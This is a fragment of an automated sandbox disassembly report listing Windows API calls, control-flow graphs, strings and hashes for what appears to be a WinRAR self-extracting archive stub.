                                          • Part of subcall function 00BCD4D4: ShowWindow.USER32(00000000,00000005,?,?,?,00BCAF07,00000001,?,?,00BCB7B9,00BE506C,00C0FCB8,00C0FCB8,00001000,00000000,00000000), ref: 00BCD510
                                          • Part of subcall function 00BCD4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00BCD51B
                                          • Part of subcall function 00BCD4D4: SendMessageW.USER32(00000000,000000C2,00000000,00BE35F4), ref: 00BCD529
                                          • Part of subcall function 00BCD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00BCD53F
                                          • Part of subcall function 00BCD4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00BCD559
                                          • Part of subcall function 00BCD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00BCD59D
                                          • Part of subcall function 00BCD4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00BCD5AB
                                          • Part of subcall function 00BCD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00BCD5BA
                                          • Part of subcall function 00BCD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00BCD5E1
                                          • Part of subcall function 00BCD4D4: SendMessageW.USER32(00000000,000000C2,00000000,00BE43F4), ref: 00BCD5F0
                                        • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00BCBA68
                                        • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00BCBA90
                                        • GetTickCount.KERNEL32 ref: 00BCBAAE
                                        • _swprintf.LIBCMT ref: 00BCBAC2
                                        • GetLastError.KERNEL32(?,00000011), ref: 00BCBAF4
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00BCBB43
                                        • _swprintf.LIBCMT ref: 00BCBB7C
                                        • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 00BCBBD0
                                        • GetCommandLineW.KERNEL32 ref: 00BCBBEA
                                        • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 00BCBC47
                                        • ShellExecuteExW.SHELL32(0000003C), ref: 00BCBC6F
                                        • Sleep.KERNEL32(00000064), ref: 00BCBCB9
                                        • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 00BCBCE2
                                        • CloseHandle.KERNEL32(00000000), ref: 00BCBCEB
                                        • _swprintf.LIBCMT ref: 00BCBD1E
                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00BCBD7D
                                        • SetDlgItemTextW.USER32(?,00000065,00BE35F4), ref: 00BCBD94
                                        • GetDlgItem.USER32(?,00000065), ref: 00BCBD9D
                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00BCBDAC
                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00BCBDBB
                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00BCBE68
                                        • _wcslen.LIBCMT ref: 00BCBEBE
                                        • _swprintf.LIBCMT ref: 00BCBEE8
                                        • SendMessageW.USER32(?,00000080,00000001,?), ref: 00BCBF32
                                        • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00BCBF4C
                                        • GetDlgItem.USER32(?,00000068), ref: 00BCBF55
                                        • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00BCBF6B
                                        • GetDlgItem.USER32(?,00000066), ref: 00BCBF85
                                        • SetWindowTextW.USER32(00000000,00BFA472), ref: 00BCBFA7
                                        • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00BCC007
                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00BCC01A
                                        • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 00BCC0BD
                                        • EnableWindow.USER32(00000000,00000000), ref: 00BCC197
                                        • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00BCC1D9
                                          • Part of subcall function 00BCC73F: __EH_prolog.LIBCMT ref: 00BCC744
                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00BCC1FD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l
                                        • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                        • API String ID: 3445078344-2238251102
                                        • Opcode ID: 747986e71b51ce33878e94d4135f4d17c57b8f2338de0b874c7505da21a93409
                                        • Instruction ID: cd53e2cef21cb33a8268dc9d55d05fc719d57c1c88cc428f67b81d5cf8b3d2cb
                                        • Opcode Fuzzy Hash: 747986e71b51ce33878e94d4135f4d17c57b8f2338de0b874c7505da21a93409
                                        • Instruction Fuzzy Hash: 5E42A471944248BAEB219B749C4AFFE7BECEB12704F0441DDF645A71E2CBB45A44CB22

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 268 bc0863-bc0886 call bcec50 GetModuleHandleW 271 bc0888-bc089f GetProcAddress 268->271 272 bc08e7-bc0b48 268->272 275 bc08b9-bc08c9 GetProcAddress 271->275 276 bc08a1-bc08b7 271->276 273 bc0b4e-bc0b59 call bd75fb 272->273 274 bc0c14-bc0c40 GetModuleFileNameW call bbc29a call bc0602 272->274 273->274 285 bc0b5f-bc0b8d GetModuleFileNameW CreateFileW 273->285 290 bc0c42-bc0c4e call bbb146 274->290 279 bc08cb-bc08e0 275->279 280 bc08e5 275->280 276->275 279->280 280->272 288 bc0b8f-bc0b9b SetFilePointer 285->288 289 bc0c08-bc0c0f CloseHandle 285->289 288->289 291 bc0b9d-bc0bb9 ReadFile 288->291 289->274 297 bc0c7d-bc0ca4 call bbc310 GetFileAttributesW 290->297 298 bc0c50-bc0c5b call bc081b 290->298 291->289 294 bc0bbb-bc0be0 291->294 296 bc0bfd-bc0c06 call bc0371 294->296 296->289 305 bc0be2-bc0bfc call bc081b 296->305 308 bc0cae 297->308 309 bc0ca6-bc0caa 297->309 298->297 307 bc0c5d-bc0c7b CompareStringW 298->307 305->296 307->297 307->309 311 bc0cb0-bc0cb5 308->311 309->290 310 bc0cac 309->310 310->311 313 bc0cec-bc0cee 311->313 314 bc0cb7 311->314 316 bc0dfb-bc0e05 313->316 317 bc0cf4-bc0d0b call bbc2e4 call bbb146 313->317 315 bc0cb9-bc0ce0 call bbc310 GetFileAttributesW 314->315 322 bc0cea 315->322 323 bc0ce2-bc0ce6 315->323 327 bc0d0d-bc0d6e call bc081b * 2 call bbe617 call bb4092 call bbe617 call bca7e4 317->327 328 bc0d73-bc0da6 call bb4092 AllocConsole 317->328 322->313 323->315 325 bc0ce8 323->325 325->313 334 bc0df3-bc0df5 ExitProcess 327->334 333 bc0da8-bc0ded GetCurrentProcessId AttachConsole call bd3e13 GetStdHandle WriteConsoleW Sleep FreeConsole 328->333 328->334 333->334
                                        APIs
                                        • GetModuleHandleW.KERNEL32(kernel32), ref: 00BC087C
                                        • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00BC088E
                                        • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00BC08BF
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00BC0B69
                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BC0B83
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00BC0B93
                                        • ReadFile.KERNEL32(00000000,?,00007FFE,00BE3C7C,00000000), ref: 00BC0BB1
                                        • CloseHandle.KERNEL32(00000000), ref: 00BC0C09
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00BC0C1E
                                        • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00BE3C7C,?,00000000,?,00000800), ref: 00BC0C72
                                        • GetFileAttributesW.KERNELBASE(?,?,00BE3C7C,00000800,?,00000000,?,00000800), ref: 00BC0C9C
                                        • GetFileAttributesW.KERNEL32(?,?,00BE3D44,00000800), ref: 00BC0CD8
                                          • Part of subcall function 00BC081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00BC0836
                                          • Part of subcall function 00BC081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00BBF2D8,Crypt32.dll,00000000,00BBF35C,?,?,00BBF33E,?,?,?), ref: 00BC0858
                                        • _swprintf.LIBCMT ref: 00BC0D4A
                                        • _swprintf.LIBCMT ref: 00BC0D96
                                          • Part of subcall function 00BB4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BB40A5
                                        • AllocConsole.KERNEL32 ref: 00BC0D9E
                                        • GetCurrentProcessId.KERNEL32 ref: 00BC0DA8
                                        • AttachConsole.KERNEL32(00000000), ref: 00BC0DAF
                                        • _wcslen.LIBCMT ref: 00BC0DC4
                                        • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00BC0DD5
                                        • WriteConsoleW.KERNEL32(00000000), ref: 00BC0DDC
                                        • Sleep.KERNEL32(00002710), ref: 00BC0DE7
                                        • FreeConsole.KERNEL32 ref: 00BC0DED
                                        • ExitProcess.KERNEL32 ref: 00BC0DF5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                        • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                        • API String ID: 1207345701-3298887752
                                        • Opcode ID: 23fc64e3c03549131e3bc157ab423f250a91341d44a35cf53f299a26fe2714bd
                                        • Instruction ID: 6ac8e4cab9532b5471d35fa41bb1331760b5183cdb3207a48f545ef13ffcaec1
                                        • Opcode Fuzzy Hash: 23fc64e3c03549131e3bc157ab423f250a91341d44a35cf53f299a26fe2714bd
                                        • Instruction Fuzzy Hash: 58D145B24183C4ABD731EF51888DF9FBBE8EB85B04F50499DF28597151CBB48648CB62

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 347 bcc73f-bcc757 call bceb78 call bcec50 352 bcd40d-bcd418 347->352 353 bcc75d-bcc787 call bcb314 347->353 353->352 356 bcc78d-bcc792 353->356 357 bcc793-bcc7a1 356->357 358 bcc7a2-bcc7b7 call bcaf98 357->358 361 bcc7b9 358->361 362 bcc7bb-bcc7d0 call bc1fbb 361->362 365 bcc7dd-bcc7e0 362->365 366 bcc7d2-bcc7d6 362->366 368 bcd3d9-bcd404 call bcb314 365->368 369 bcc7e6 365->369 366->362 367 bcc7d8 366->367 367->368 368->357 380 bcd40a-bcd40c 368->380 371 bcca7c-bcca7e 369->371 372 bcc7ed-bcc7f0 369->372 373 bcc9be-bcc9c0 369->373 374 bcca5f-bcca61 369->374 371->368 377 bcca84-bcca8b 371->377 372->368 379 bcc7f6-bcc850 call bca64d call bbbdf3 call bba544 call bba67e call bb6edb 372->379 373->368 378 bcc9c6-bcc9d2 373->378 374->368 375 bcca67-bcca77 SetWindowTextW 374->375 375->368 377->368 381 bcca91-bccaaa 377->381 382 bcc9d4-bcc9e5 call bd7686 378->382 383 bcc9e6-bcc9eb 378->383 436 bcc98f-bcc9a4 call bba5d1 379->436 380->352 387 bccaac 381->387 388 bccab2-bccac0 call bd3e13 381->388 382->383 385 bcc9ed-bcc9f3 383->385 386 bcc9f5-bcca00 call bcb48e 383->386 392 bcca05-bcca07 385->392 386->392 387->388 388->368 401 bccac6-bccacf 388->401 398 bcca09-bcca10 call bd3e13 392->398 399 bcca12-bcca32 call bd3e13 call bd3e3e 392->399 398->399 424 bcca4b-bcca4d 399->424 425 bcca34-bcca3b 399->425 405 bccaf8-bccafb 401->405 406 bccad1-bccad5 401->406 411 bccb01-bccb04 405->411 413 bccbe0-bccbee call bc0602 405->413 410 bccad7-bccadf 406->410 406->411 410->368 416 bccae5-bccaf3 call bc0602 410->416 418 bccb06-bccb0b 411->418 419 bccb11-bccb2c 411->419 426 bccbf0-bccc04 call bd279b 413->426 416->426 418->413 418->419 437 bccb2e-bccb68 419->437 438 bccb76-bccb7d 419->438 424->368 427 bcca53-bcca5a call bd3e2e 424->427 431 bcca3d-bcca3f 425->431 432 bcca42-bcca4a call bd7686 425->432 446 bccc06-bccc0a 426->446 447 bccc11-bccc62 call bc0602 call bcb1be GetDlgItem SetWindowTextW SendMessageW call bd3e49 426->447 427->368 431->432 432->424 453 bcc9aa-bcc9b9 call bba55a 436->453 454 bcc855-bcc869 SetFileAttributesW 436->454 464 bccb6c-bccb6e 437->464 465 bccb6a 437->465 440 bccb7f-bccb97 call bd3e13 438->440 441 bccbab-bccbce call bd3e13 * 2 438->441 440->441 458 bccb99-bccba6 call bc05da 440->458 441->426 475 bccbd0-bccbde call bc05da 441->475 446->447 452 bccc0c-bccc0e 446->452 483 bccc67-bccc6b 447->483 452->447 453->368 460 bcc90f-bcc91f GetFileAttributesW 454->460 461 bcc86f-bcc8a2 call bbb991 call bbb690 call bd3e13 454->461 458->441 460->436 470 bcc921-bcc930 DeleteFileW 460->470 490 bcc8a4-bcc8b3 call bd3e13 461->490 491 bcc8b5-bcc8c3 call bbbdb4 461->491 464->438 465->464 470->436 474 bcc932-bcc935 470->474 478 bcc939-bcc965 call bb4092 GetFileAttributesW 474->478 475->426 487 bcc937-bcc938 478->487 488 bcc967-bcc97d MoveFileW 478->488 483->368 484 bccc71-bccc85 SendMessageW 483->484 484->368 487->478 488->436 492 bcc97f-bcc989 MoveFileExW 488->492 490->491 497 bcc8c9-bcc908 call bd3e13 call bcfff0 490->497 491->453 491->497 492->436 497->460
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 00BCC744
                                          • Part of subcall function 00BCB314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00BCB3FB
                                        • _wcslen.LIBCMT ref: 00BCCA0A
                                        • _wcslen.LIBCMT ref: 00BCCA13
                                        • SetWindowTextW.USER32(?,?), ref: 00BCCA71
                                        • _wcslen.LIBCMT ref: 00BCCAB3
                                        • _wcsrchr.LIBVCRUNTIME ref: 00BCCBFB
                                        • GetDlgItem.USER32(?,00000066), ref: 00BCCC36
                                        • SetWindowTextW.USER32(00000000,?), ref: 00BCCC46
                                        • SendMessageW.USER32(00000000,00000143,00000000,00BFA472), ref: 00BCCC54
                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00BCCC7F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                        • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                        • API String ID: 2804936435-312220925
                                        • Opcode ID: 32a54b4dae8898289c2e71745beff5793b263fb3e4e40f459c2e8a609ae96647
                                        • Instruction ID: a8d8047bc3bd8bd89ad4fc76e6334a38740dc9d720546acc6084ee93449fe79d
                                        • Opcode Fuzzy Hash: 32a54b4dae8898289c2e71745beff5793b263fb3e4e40f459c2e8a609ae96647
                                        • Instruction Fuzzy Hash: F5E150B2900258ABDB25DBA0DC85FEE77FCEB14710F4040EAF609E7151EB749E848B65
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 00BBDA70
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00BBDAAC
                                          • Part of subcall function 00BBC29A: _wcslen.LIBCMT ref: 00BBC2A2
                                          • Part of subcall function 00BC05DA: _wcslen.LIBCMT ref: 00BC05E0
                                          • Part of subcall function 00BC1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00BBBAE9,00000000,?,?,?,0001044E), ref: 00BC1BA0
                                        • _wcslen.LIBCMT ref: 00BBDDE9
                                        • __fprintf_l.LIBCMT ref: 00BBDF1C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
                                        • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                        • API String ID: 566448164-801612888
                                        • Opcode ID: ffb30c8d5a5c7cd9ae0c7777a29e90fce47785dcaa6d0217c3a7878e59c6ed94
                                        • Instruction ID: ab21d8e5ca7b7879e3d48018b6002eb9cc20a514e6981b58a3c4ae21390cdde2
                                        • Opcode Fuzzy Hash: ffb30c8d5a5c7cd9ae0c7777a29e90fce47785dcaa6d0217c3a7878e59c6ed94
                                        • Instruction Fuzzy Hash: 8432CF719002189BCF24EF68C886BFE77E5EF14700F5005AAF916A72A1EBB5DD85CB50

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 00BCB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00BCB579
                                          • Part of subcall function 00BCB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00BCB58A
                                          • Part of subcall function 00BCB568: IsDialogMessageW.USER32(0001044E,?), ref: 00BCB59E
                                          • Part of subcall function 00BCB568: TranslateMessage.USER32(?), ref: 00BCB5AC
                                          • Part of subcall function 00BCB568: DispatchMessageW.USER32(?), ref: 00BCB5B6
                                        • GetDlgItem.USER32(00000068,00C0FCB8), ref: 00BCD4E8
                                        • ShowWindow.USER32(00000000,00000005,?,?,?,00BCAF07,00000001,?,?,00BCB7B9,00BE506C,00C0FCB8,00C0FCB8,00001000,00000000,00000000), ref: 00BCD510
                                        • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00BCD51B
                                        • SendMessageW.USER32(00000000,000000C2,00000000,00BE35F4), ref: 00BCD529
                                        • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00BCD53F
                                        • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00BCD559
                                        • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00BCD59D
                                        • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00BCD5AB
                                        • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00BCD5BA
                                        • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00BCD5E1
                                        • SendMessageW.USER32(00000000,000000C2,00000000,00BE43F4), ref: 00BCD5F0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                        • String ID: \
                                        • API String ID: 3569833718-2967466578
                                        • Opcode ID: 4ecc733d11a369bba3287e55843ae9aabc9d8be312155403ae9b38632433a3d0
                                        • Instruction ID: eaab790f0bc454dd3d4788c67d65605872e2f69a91e92387dd4fbaa32ffda179
                                        • Opcode Fuzzy Hash: 4ecc733d11a369bba3287e55843ae9aabc9d8be312155403ae9b38632433a3d0
                                        • Instruction Fuzzy Hash: 3631BE71245382ABE301DF209C4AFAF7BECFB96708F004558F551962A0DB658A05C776

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 836 bcd78f-bcd7a7 call bcec50 839 bcd7ad-bcd7b9 call bd3e13 836->839 840 bcd9e8-bcd9f0 836->840 839->840 843 bcd7bf-bcd7e7 call bcfff0 839->843 846 bcd7e9 843->846 847 bcd7f1-bcd7ff 843->847 846->847 848 bcd801-bcd804 847->848 849 bcd812-bcd818 847->849 850 bcd808-bcd80e 848->850 851 bcd85b-bcd85e 849->851 852 bcd837-bcd844 850->852 853 bcd810 850->853 851->850 854 bcd860-bcd866 851->854 856 bcd84a-bcd84e 852->856 857 bcd9c0-bcd9c2 852->857 855 bcd822-bcd82c 853->855 858 bcd86d-bcd86f 854->858 859 bcd868-bcd86b 854->859 860 bcd82e 855->860 861 bcd81a-bcd820 855->861 862 bcd854-bcd859 856->862 863 bcd9c6 856->863 857->863 864 bcd882-bcd898 call bbb92d 858->864 865 bcd871-bcd878 858->865 859->858 859->864 860->852 861->855 868 bcd830-bcd833 861->868 862->851 870 bcd9cf 863->870 871 bcd89a-bcd8a7 call bc1fbb 864->871 872 bcd8b1-bcd8bc call bba231 864->872 865->864 866 bcd87a 865->866 866->864 868->852 873 bcd9d6-bcd9d8 870->873 871->872 881 bcd8a9 871->881 882 bcd8be-bcd8d5 call bbb6c4 872->882 883 bcd8d9-bcd8e6 ShellExecuteExW 872->883 876 bcd9da-bcd9dc 873->876 877 bcd9e7 873->877 876->877 880 bcd9de-bcd9e1 ShowWindow 876->880 877->840 880->877 881->872 882->883 883->877 885 bcd8ec-bcd8f9 883->885 886 bcd90c-bcd90e 885->886 887 bcd8fb-bcd902 885->887 890 bcd925-bcd944 call bcdc3b 886->890 891 bcd910-bcd919 886->891 887->886 889 bcd904-bcd90a 887->889 889->886 892 bcd97b-bcd987 CloseHandle 889->892 890->892 905 bcd946-bcd94e 890->905 891->890 899 bcd91b-bcd923 ShowWindow 891->899 893 bcd998-bcd9a6 892->893 894 bcd989-bcd996 call bc1fbb 892->894 893->873 898 bcd9a8-bcd9aa 893->898 894->870 894->893 898->873 902 bcd9ac-bcd9b2 898->902 899->890 902->873 904 bcd9b4-bcd9be 902->904 904->873 905->892 906 bcd950-bcd961 GetExitCodeProcess 905->906 906->892 907 bcd963-bcd96d 906->907 908 bcd96f 907->908 909 bcd974 907->909 908->909 909->892
                                        APIs
                                        • _wcslen.LIBCMT ref: 00BCD7AE
                                        • ShellExecuteExW.SHELL32(?), ref: 00BCD8DE
                                        • ShowWindow.USER32(?,00000000), ref: 00BCD91D
                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 00BCD959
                                        • CloseHandle.KERNEL32(?), ref: 00BCD97F
                                        • ShowWindow.USER32(?,00000001), ref: 00BCD9E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                        • String ID: .exe$.inf
                                        • API String ID: 36480843-3750412487
                                        • Opcode ID: 83f978db8c9ae103664bd653c255738d4472656a47a8e43c6c45b6477a7c6bdd
                                        • Instruction ID: a88240a73515f7266d488e730a6c9d92c29a2e6b681d7f32cbeeab73539ee1b6
                                        • Opcode Fuzzy Hash: 83f978db8c9ae103664bd653c255738d4472656a47a8e43c6c45b6477a7c6bdd
                                        • Instruction Fuzzy Hash: D651D47C504380AAEB309B249844FBFBBE4EF86744F0448BEF5C597191E7B49A85C752

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
